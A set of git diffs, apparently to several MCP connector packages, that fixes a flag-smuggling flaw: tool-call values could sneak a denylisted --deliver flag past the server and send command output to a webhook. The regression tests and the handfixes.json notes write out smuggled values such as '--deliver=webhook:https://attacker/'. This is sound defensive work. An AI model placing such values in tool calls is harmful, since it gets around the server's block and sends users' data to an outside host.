+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/skykick/handfixes.json
+++ b/skills/skykick/handfixes.json
@@ -338,6 +338,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/skykick/handfixes.json
+++ b/skills/skykick/handfixes.json
@@ -353,8 +353,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -364,7 +376,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/superops/CHANGELOG.md
+++ b/skills/superops/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.6] - 2026-08-26
 

--- a/skills/superops/CHANGELOG.md
+++ b/skills/superops/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.6] - 2026-08-26

--- a/skills/superops/CHANGELOG.md
+++ b/skills/superops/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.7]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.6] - 2026-08-26
 
 ### Fixed

--- a/skills/superops/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/superops/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/superops/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/superops/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/superops/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/superops/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/superops/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/superops/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/superops/handfixes.json
+++ b/skills/superops/handfixes.json
@@ -292,8 +292,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -303,7 +315,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/superops/handfixes.json
+++ b/skills/superops/handfixes.json
@@ -277,6 +277,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/syncro/CHANGELOG.md
+++ b/skills/syncro/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/syncro/CHANGELOG.md
+++ b/skills/syncro/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/syncro/CHANGELOG.md
+++ b/skills/syncro/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/syncro/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/syncro/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/syncro/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/syncro/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/syncro/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/syncro/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/syncro/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/syncro/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/syncro/handfixes.json
+++ b/skills/syncro/handfixes.json
@@ -187,8 +187,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -198,7 +210,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
